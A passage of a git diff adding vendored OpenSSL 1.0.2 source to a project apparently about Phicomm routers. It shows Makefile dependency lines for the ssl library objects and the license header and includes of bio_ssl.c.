+ssl_cert.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_cert.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_cert.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_cert.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_cert.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_cert.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_cert.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_cert.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_cert.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_cert.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ssl_cert.o: ../include/openssl/x509v3.h ssl_cert.c ssl_locl.h
+ssl_ciph.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_ciph.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_ciph.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_ciph.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_ciph.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_ciph.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_ciph.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_ciph.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_ciph.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_ciph.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_ciph.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_ciph.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_ciph.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_ciph.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_ciph.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_ciph.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_ciph.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_ciph.c
+ssl_ciph.o: ssl_locl.h
+ssl_conf.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_conf.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+ssl_conf.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+ssl_conf.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_conf.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_conf.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_conf.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_conf.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_conf.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_conf.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_conf.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_conf.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_conf.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_conf.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_conf.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_conf.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_conf.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_conf.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_conf.c
+ssl_conf.o: ssl_locl.h
+ssl_err.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_err.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_err.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ssl_err.o: ../include/openssl/err.h ../include/openssl/evp.h
+ssl_err.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ssl_err.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ssl_err.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ssl_err.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssl_err.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssl_err.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssl_err.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_err.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_err.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_err.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_err.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_err.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_err.c
+ssl_err2.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_err2.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_err2.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ssl_err2.o: ../include/openssl/err.h ../include/openssl/evp.h
+ssl_err2.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ssl_err2.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ssl_err2.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ssl_err2.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssl_err2.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssl_err2.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssl_err2.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_err2.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_err2.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_err2.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_err2.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_err2.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_err2.c
+ssl_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_lib.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+ssl_lib.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+ssl_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_lib.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ssl_lib.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssl_lib.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssl_lib.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssl_lib.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+ssl_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ssl_lib.o: ../include/openssl/x509v3.h kssl_lcl.h ssl_lib.c ssl_locl.h
+ssl_rsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_rsa.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_rsa.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_rsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_rsa.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_rsa.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_rsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_rsa.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_rsa.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_rsa.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_rsa.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_rsa.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_rsa.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_rsa.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_rsa.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_rsa.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_rsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_rsa.o: ssl_rsa.c
+ssl_sess.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_sess.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_sess.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_sess.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_sess.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_sess.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_sess.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_sess.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_sess.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_sess.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_sess.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+ssl_sess.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+ssl_sess.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+ssl_sess.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+ssl_sess.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+ssl_sess.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+ssl_sess.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+ssl_sess.o: ../include/openssl/x509_vfy.h ssl_locl.h ssl_sess.c
+ssl_stat.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_stat.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_stat.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_stat.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_stat.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_stat.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_stat.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_stat.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_stat.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_stat.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_stat.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_stat.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_stat.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_stat.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_stat.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_stat.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_stat.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_stat.o: ssl_stat.c
+ssl_txt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_txt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_txt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_txt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_txt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_txt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_txt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_txt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_txt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_txt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_txt.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_txt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_txt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_txt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_txt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_txt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_txt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_txt.o: ssl_txt.c
+ssl_utst.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_utst.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_utst.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_utst.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_utst.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_utst.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_utst.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_utst.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_utst.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_utst.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_utst.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_utst.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_utst.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_utst.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_utst.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_utst.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_utst.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_utst.o: ssl_utst.c
+t1_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_clnt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_clnt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_clnt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_clnt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_clnt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_clnt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+t1_clnt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+t1_clnt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+t1_clnt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+t1_clnt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+t1_clnt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+t1_clnt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+t1_clnt.o: ../include/openssl/x509_vfy.h ssl_locl.h t1_clnt.c
+t1_enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_enc.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_enc.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_enc.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_enc.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_enc.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_enc.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+t1_enc.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+t1_enc.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+t1_enc.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+t1_enc.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+t1_enc.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+t1_enc.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_enc.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_enc.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_enc.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_enc.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_enc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_enc.o: t1_enc.c
+t1_ext.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_ext.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_ext.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_ext.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_ext.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_ext.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_ext.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_ext.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_ext.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_ext.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_ext.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_ext.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_ext.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_ext.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_ext.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_ext.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_ext.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_ext.o: t1_ext.c
+t1_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_lib.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+t1_lib.o: ../include/openssl/crypto.h ../include/openssl/dsa.h
+t1_lib.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+t1_lib.o: ../include/openssl/err.h ../include/openssl/evp.h
+t1_lib.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+t1_lib.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+t1_lib.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+t1_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_lib.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+t1_lib.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+t1_lib.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+t1_lib.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+t1_lib.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+t1_lib.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+t1_lib.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+t1_lib.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h ssl_locl.h
+t1_lib.o: t1_lib.c
+t1_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_meth.o: t1_meth.c
+t1_reneg.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_reneg.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_reneg.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_reneg.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_reneg.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_reneg.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_reneg.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_reneg.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_reneg.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_reneg.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_reneg.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_reneg.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_reneg.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_reneg.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_reneg.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_reneg.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_reneg.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_reneg.o: t1_reneg.c
+t1_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+t1_srvr.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+t1_srvr.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+t1_srvr.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+t1_srvr.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+t1_srvr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+t1_srvr.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+t1_srvr.o: ../include/openssl/x509_vfy.h ssl_locl.h t1_srvr.c
+t1_trce.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_trce.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_trce.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_trce.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_trce.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_trce.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_trce.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_trce.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_trce.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_trce.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_trce.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_trce.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_trce.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_trce.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_trce.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_trce.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_trce.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_trce.o: t1_trce.c
+tls_srp.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+tls_srp.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+tls_srp.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+tls_srp.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+tls_srp.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+tls_srp.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+tls_srp.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+tls_srp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+tls_srp.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+tls_srp.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+tls_srp.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+tls_srp.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+tls_srp.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+tls_srp.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+tls_srp.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+tls_srp.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+tls_srp.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+tls_srp.o: tls_srp.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/bio_ssl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/bio_ssl.c
new file mode 100644
index 0000000..a0c583e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/bio_ssl.c
@@ -0,0 +1,587 @@
+/* ssl/bio_ssl.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <openssl/crypto.h>
+#include <openssl/bio.h>
+#include <openssl/err.h>
